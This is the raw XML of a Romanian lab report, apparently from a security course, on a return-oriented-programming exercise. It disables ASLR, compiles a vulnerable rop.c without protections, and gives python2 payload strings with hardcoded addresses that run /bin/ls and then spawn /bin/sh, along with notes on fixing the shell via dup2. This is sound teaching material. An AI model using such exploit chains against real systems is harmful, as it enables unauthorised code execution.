          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ECA6A0" w14:textId="7C298D59" w:rsidR="009A49EA" w:rsidRDefault="009A49EA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 w:rsidRPr="00315F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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space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11EED8" w14:textId="37D37089" w:rsidR="00D330CF" w:rsidRDefault="009A49EA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 w:rsidRPr="005A20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gcc -g -O0 -fno-stack-protector -o rop rop.c -no-pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02A97C" w14:textId="77777777" w:rsidR="00723B01" w:rsidRDefault="00723B01" w:rsidP="00C20F6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3ED4718" w14:textId="242CEB57" w:rsidR="00A95E8C" w:rsidRPr="00A95E8C" w:rsidRDefault="00A95E8C" w:rsidP="00C20F6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Pentru ls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590FE34" w14:textId="6698832D" w:rsidR="00D330CF" w:rsidRPr="00D330CF" w:rsidRDefault="00D330CF" w:rsidP="00C20F6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30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python2 -c 'print("/bin/ls\x00"+"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+104*"A"+"\xe0\xa7\xbf\xca\xff\x7f\x00\x00"+"\x6a\x3b\x0b\x51\x0f\x7f\x00\x00"+"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+"\x1f\x60\x0b\x51\x0f\x7f\x00\x00"+"\x38\xa7\xbf\xca\xff\x7f\x00\x00"+"\x92\x2c\x1d\x51\x0f\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x70\x31\x17\x51\x0f\x7f\x00\x00")' | ./rop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AAB90" w14:textId="2A483466" w:rsidR="00B60CE0" w:rsidRDefault="00DF126C" w:rsidP="00C20F69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF12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EFA15" wp14:editId="6C9CC6FA">
            <wp:extent cx="5734345" cy="78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16F2" w14:textId="77777777" w:rsidR="00A95E8C" w:rsidRDefault="00A95E8C" w:rsidP="00A95E8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5185CB9" w14:textId="29E2F2AC" w:rsidR="00A95E8C" w:rsidRPr="00A95E8C" w:rsidRDefault="00A95E8C" w:rsidP="00A95E8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Pentru </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sh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2A9F2AE" w14:textId="03EA7FA3" w:rsidR="00A95E8C" w:rsidRPr="00D330CF" w:rsidRDefault="00A95E8C" w:rsidP="00A95E8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30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python2 -c 'print("/bin/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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D330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\x00"+"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+104*"A"+"\xe0\xa7\xbf\xca\xff\x7f\x00\x00"+"\x6a\x3b\x0b\x51\x0f\x7f\x00\x00"+"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+"\x1f\x60\x0b\x51\x0f\x7f\x00\x00"+"\x38\xa7\xbf\xca\xff\x7f\x00\x00"+"\x92\x2c\x1d\x51\x0f\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x70\x31\x17\x51\x0f\x7f\x00\x00")' | ./rop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1902D" w14:textId="5F5DCDF6" w:rsidR="00906B8C" w:rsidRDefault="007F7EA0" w:rsidP="00A95E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Comanda nu rulează (nimic nu se întâmplă).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3A60E" w14:textId="2D509806" w:rsidR="00BE1C34" w:rsidRDefault="00BE1C34" w:rsidP="00A95E8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1C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401214" wp14:editId="2B2424A5">
            <wp:extent cx="5760720" cy="8362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98EF" w14:textId="7A3EFC7E" w:rsidR="00BE1C34" w:rsidRDefault="00BE1C34" w:rsidP="00A95E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69175" w14:textId="2A2B9F16" w:rsidR="001974AB" w:rsidRDefault="001974AB" w:rsidP="00A95E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ultimul exercițiu, decomentez </w:t>
      </w:r>
      <w:r w:rsidRPr="001974AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dup2(1, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> și recompilez.</w:t>
      </w:r>
      <w:r w:rsidR="00775484">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obținem adresa:</w:t>
      </w:r>
      <w:r w:rsidR="00AA0661">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA0661" w:rsidRPr="00AA0661">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x7fffff6be8c0</w:t>
      </w:r>
      <w:r w:rsidR="00AA0661">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA5DCC" w14:textId="6C91ABF5" w:rsidR="00C50A6F" w:rsidRDefault="00C50A6F" w:rsidP="00A95E8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50A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01D222" wp14:editId="3AE12D1B">
            <wp:extent cx="5760720" cy="17348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312F" w14:textId="5F1D43AB" w:rsidR="00775484" w:rsidRDefault="00952362" w:rsidP="00A95E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Noua comandă:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9DD8D" w14:textId="65B4A354" w:rsidR="006837EB" w:rsidRPr="006349F5" w:rsidRDefault="006837EB" w:rsidP="00A95E8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30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python2 -c 'print("/bin/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sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00D330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\x00"+"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+104*"A"+"\xe0\xa7\xbf\xca\xff\x7f\x00\x00"+"\x6a\x3b\x0b\x51\x0f\x7f\x00\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="006837E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"+</w:t>
      </w:r>
      <w:r w:rsidRPr="006837E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u w:val="single"/>
        </w:rPr>
        <w:t>"\x01\x00\x00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\x00\x00\x00\x00\x00"+"\x1f\x60\x0b\x51\x0f\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x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0\x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e8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\x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6b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\x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ff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\x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ff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\x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7f</w:t>
      </w:r>
      <w:r w:rsidRPr="006837E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\x00\x00"</w:t>
      </w:r>
      <w:r w:rsidRPr="006837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+</w:t>
      </w:r>
      <w:r w:rsidR="006349F5" w:rsidRPr="00634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"\x6a\x3b\x0b\x51\x0f\x7f\x00\x00"+</w:t>
      </w:r>
      <w:r w:rsidR="006349F5" w:rsidRPr="00D330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"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+</w:t>
      </w:r>
      <w:r w:rsidR="006349F5" w:rsidRPr="00634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"\x1f\x60\x0b\x51\x0f\x7f\x00\x00"+</w:t>
      </w:r>
      <w:r w:rsidR="00634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"\x3</w:t>
      </w:r>
      <w:r w:rsidR="00634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8</w:t>
      </w:r>
      <w:r w:rsidR="00634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\xa7\xbf\xca\xff\x7f\x00\x00"+</w:t>
      </w:r>
      <w:r w:rsidR="006349F5" w:rsidRPr="00D330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"\x92\x2c\x1d\x51\x0f\x7f\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00"+"\x70\x31\x17\x51\x0f\x7f\x00\x00")' | ./rop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67317068" w14:textId="52F879C9" w:rsidR="00952362" w:rsidRDefault="00952362" w:rsidP="00A95E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Acum shell-ul funcționează.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE498B" w14:textId="0930D22E" w:rsidR="0080354F" w:rsidRPr="00D933BE" w:rsidRDefault="0080354F" w:rsidP="00A95E8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008035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55084B" wp14:editId="5D79153E">
            <wp:extent cx="5760720" cy="11798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54F" w:rsidRPr="00D93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0926"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="791E1ADC"/>
    <w:lvl w:ilvl="0" w:tplc="02FE1D1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E5712"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C7EE66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06776"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD7E0F84"/>
    <w:lvl w:ilvl="0" w:tplc="0418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716B70C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BA4D9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897880">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1364749528">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="224417262">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="137039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E5"/>
    <w:rsid w:val="000053BF"/>
    <w:rsid w:val="00013411"/>
    <w:rsid w:val="00033982"/>
    <w:rsid w:val="000714B5"/>
    <w:rsid w:val="00081AD4"/>
    <w:rsid w:val="000B37B7"/>
    <w:rsid w:val="000B6482"/>
    <w:rsid w:val="000F4D3D"/>
    <w:rsid w:val="000F77A1"/>
    <w:rsid w:val="00112352"/>
    <w:rsid w:val="00112BA5"/>
    <w:rsid w:val="00145EBC"/>
    <w:rsid w:val="001479CC"/>
    <w:rsid w:val="00155877"/>
    <w:rsid w:val="001974AB"/>
    <w:rsid w:val="001D21A8"/>
    <w:rsid w:val="001D2845"/>
    <w:rsid w:val="001F512C"/>
    <w:rsid w:val="0023311B"/>
    <w:rsid w:val="00241B41"/>
    <w:rsid w:val="0025138B"/>
    <w:rsid w:val="00267D5B"/>
    <w:rsid w:val="002A5CF7"/>
    <w:rsid w:val="002B406C"/>
    <w:rsid w:val="00316A4B"/>
    <w:rsid w:val="00342D1A"/>
    <w:rsid w:val="00362120"/>
    <w:rsid w:val="003E31CC"/>
    <w:rsid w:val="003F1BF8"/>
    <w:rsid w:val="00405CE7"/>
    <w:rsid w:val="00407173"/>
    <w:rsid w:val="004300CF"/>
    <w:rsid w:val="00435080"/>
    <w:rsid w:val="0046247A"/>
    <w:rsid w:val="0046434C"/>
    <w:rsid w:val="00464572"/>
    <w:rsid w:val="004F4706"/>
    <w:rsid w:val="004F6978"/>
    <w:rsid w:val="005079F4"/>
    <w:rsid w:val="0051050F"/>
    <w:rsid w:val="00530E40"/>
    <w:rsid w:val="00547EA0"/>
    <w:rsid w:val="005938BA"/>
    <w:rsid w:val="005A20C2"/>
    <w:rsid w:val="005A350F"/>
    <w:rsid w:val="005C7A4E"/>
    <w:rsid w:val="005D5056"/>
    <w:rsid w:val="005F14E7"/>
    <w:rsid w:val="006141DE"/>
    <w:rsid w:val="00632EEC"/>
    <w:rsid w:val="006349F5"/>
    <w:rsid w:val="00663F41"/>
    <w:rsid w:val="00665C74"/>
    <w:rsid w:val="006837EB"/>
    <w:rsid w:val="006D4556"/>
    <w:rsid w:val="00723B01"/>
    <w:rsid w:val="00750C88"/>
    <w:rsid w:val="0076675D"/>
    <w:rsid w:val="00770BC4"/>
    <w:rsid w:val="00775484"/>
    <w:rsid w:val="00781956"/>
    <w:rsid w:val="00787239"/>
    <w:rsid w:val="007967C8"/>
    <w:rsid w:val="007E4F88"/>
    <w:rsid w:val="007F7EA0"/>
    <w:rsid w:val="0080354F"/>
    <w:rsid w:val="00814AF8"/>
    <w:rsid w:val="008261DA"/>
    <w:rsid w:val="00871B68"/>
    <w:rsid w:val="008B52AB"/>
    <w:rsid w:val="008C2266"/>
    <w:rsid w:val="008D59F2"/>
    <w:rsid w:val="00903D9D"/>
    <w:rsid w:val="00906B8C"/>
    <w:rsid w:val="00952362"/>
    <w:rsid w:val="0098656E"/>
    <w:rsid w:val="00995DA5"/>
    <w:rsid w:val="009A1C14"/>
    <w:rsid w:val="009A49EA"/>
    <w:rsid w:val="009C68ED"/>
    <w:rsid w:val="009E6AA0"/>
    <w:rsid w:val="009F3B52"/>
    <w:rsid w:val="00A03C05"/>
    <w:rsid w:val="00A05B93"/>
    <w:rsid w:val="00A14C4D"/>
    <w:rsid w:val="00A53DEC"/>
    <w:rsid w:val="00A9062B"/>
    <w:rsid w:val="00A95E8C"/>
    <w:rsid w:val="00AA0661"/>
    <w:rsid w:val="00AA312C"/>
    <w:rsid w:val="00AC2834"/>
    <w:rsid w:val="00AE4A04"/>
    <w:rsid w:val="00B040D4"/>
    <w:rsid w:val="00B05E5F"/>
    <w:rsid w:val="00B201E7"/>
    <w:rsid w:val="00B60CE0"/>
    <w:rsid w:val="00B70E6F"/>
    <w:rsid w:val="00B74F3D"/>
    <w:rsid w:val="00B92DD3"/>
    <w:rsid w:val="00BE1C34"/>
    <w:rsid w:val="00BE228A"/>
    <w:rsid w:val="00BF0936"/>
    <w:rsid w:val="00BF3C7B"/>
    <w:rsid w:val="00C20F69"/>
    <w:rsid w:val="00C337E5"/>
    <w:rsid w:val="00C50A6F"/>
    <w:rsid w:val="00C636F8"/>
    <w:rsid w:val="00C84119"/>
    <w:rsid w:val="00CA3B0B"/>
    <w:rsid w:val="00CE5819"/>
    <w:rsid w:val="00CE6E29"/>
    <w:rsid w:val="00CF7B6B"/>
    <w:rsid w:val="00D11B50"/>
    <w:rsid w:val="00D15819"/>
    <w:rsid w:val="00D330CF"/>
    <w:rsid w:val="00D3533A"/>
    <w:rsid w:val="00D52CA1"/>
    <w:rsid w:val="00D71542"/>
    <w:rsid w:val="00D933BE"/>
    <w:rsid w:val="00DC5572"/>
    <w:rsid w:val="00DE5595"/>
    <w:rsid w:val="00DE645C"/>
    <w:rsid w:val="00DF126C"/>
    <w:rsid w:val="00E002B4"/>
    <w:rsid w:val="00E067BF"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E154D7"/>
    <w:rsid w:val="00E305B6"/>
    <w:rsid w:val="00E61AC6"/>
    <w:rsid w:val="00E842F9"/>
    <w:rsid w:val="00E94347"/>
    <w:rsid w:val="00EA0AFA"/>
    <w:rsid w:val="00EA1FE0"/>
    <w:rsid w:val="00F010D6"/>
    <w:rsid w:val="00F21C37"/>
    <w:rsid w:val="00F276F9"/>
    <w:rsid w:val="00F54C23"/>
    <w:rsid w:val="00FC2E55"/>
    <w:rsid w:val="00FC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DB71"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C8E260A-EA08-4300-8EE9-BA40156B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A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0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9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5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632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134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-26T22:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-02T03:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>